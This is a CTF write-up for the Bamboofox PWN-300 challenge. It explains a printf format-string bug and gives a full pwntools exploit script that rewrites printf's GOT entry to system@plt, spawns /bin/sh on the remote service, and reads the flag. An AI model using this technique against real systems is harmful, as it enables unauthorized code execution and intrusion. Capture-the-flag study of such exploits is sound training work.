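# Bamboofox/Hitcon community/PWN-300 [300]

###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup`

題目檔案連結:http://gofile.me/6lhQ2/ZL2EZu35z

Format String + GOT hijack

The service passes our input straight to `printf()` as the format string, so a crafted line can write to arbitrary memory. The exploit overwrites the GOT entry of `printf` with the address of `system@plt`; from then on every line the program "prints" is executed as a shell command, so the next line we send is `/bin/sh`.

```python
# -*- coding: UTF-8 -*-
"""Bamboofox PWN-300: format-string write that hijacks printf@GOT with system@plt.

Flow:
  1. send a format string that rewrites GOT[printf] := system@plt (two 16-bit
     %hn writes, so the padding stays well under 64 KiB),
  2. send "/bin/sh", which the program now hands to system() instead of printf(),
  3. read the flag through the shell.
"""
import time

from pwn import *

local = False   # run ./binary_300 locally instead of talking to the remote service
debug = True    # verbose pwntools tube logging
gdb1 = False    # attach gdb to the local process (only meaningful when local is True)

elf1 = ELF("./binary_300")

if debug:
    context.log_level = "debug"

if local:
    r = process("./binary_300")
    if gdb1:
        gdb.attach(r)
else:
    r = remote('bamboofox.cs.nctu.edu.tw', 22003)

printf_got = elf1.got['printf']   # 0x804a00c
system_plt = elf1.plt['system']   # 0x8048410

# Index of our input buffer among printf's stack arguments on this binary
# (author's value; re-derive with "%N$x" probes if the binary is rebuilt).
FMT_OFFSET = 7


def build_fmt_payload(target, value, offset):
    """Return a format string that stores the 32-bit *value* at *target*.

    The value is split into two 16-bit halves, each written with %hn, so the
    longest padding run is below 64 KiB rather than 4 GiB.  The halves are
    written in ascending order of their value and the padding before each
    %hn is taken modulo 0x10000, so the payload is also correct when the
    second half is smaller than the first (the hand-built original only
    handled the case where it is larger).  The addresses are taken from
    ELF/PLT lookups instead of being re-typed as literals, so the payload
    cannot silently disagree with the commented constants above.

    target: address of the 4-byte slot to overwrite (here a GOT entry).
    value:  32-bit value to store there (here system@plt).
    offset: format-argument index at which the first p32() of the payload
            is found on the stack.
    """
    halves = sorted([(value & 0xffff, target), (value >> 16, target + 2)])
    addrs = b"".join(p32(addr) for _, addr in halves)
    payload = addrs
    written = len(addrs)  # bytes printf has emitted so far: the raw addresses
    for i, (half, _) in enumerate(halves):
        pad = (half - written) % 0x10000
        if pad:
            # "%<pad>c" pads a single character to width pad.  A width of 0
            # would still print one byte, so emit nothing when no padding
            # is needed.
            payload += b"%" + str(pad).encode('utf-8') + b"c"
        payload += b"%" + str(offset + i).encode('utf-8') + b"$hn"
        written += pad
    return payload


payload = build_fmt_payload(printf_got, system_plt, FMT_OFFSET)
# For this binary the result is identical to the hand-written
#   p32(printf_got+2) + p32(printf_got) + b"%2044c%7$hn%31756c%8$hn"
# i.e. 0x0804 into the high half and 0x8410 into the low half of GOT[printf].
r.sendline(payload)

# GOT[printf] now points at system@plt: whatever the program prints next is
# run as a shell command, so this line becomes system("/bin/sh").
r.sendline(b"/bin/sh")
time.sleep(2)  # give the shell a moment to spawn before feeding it a command
r.sendline(b"cat /home/ctf/flag")
r.interactive()
```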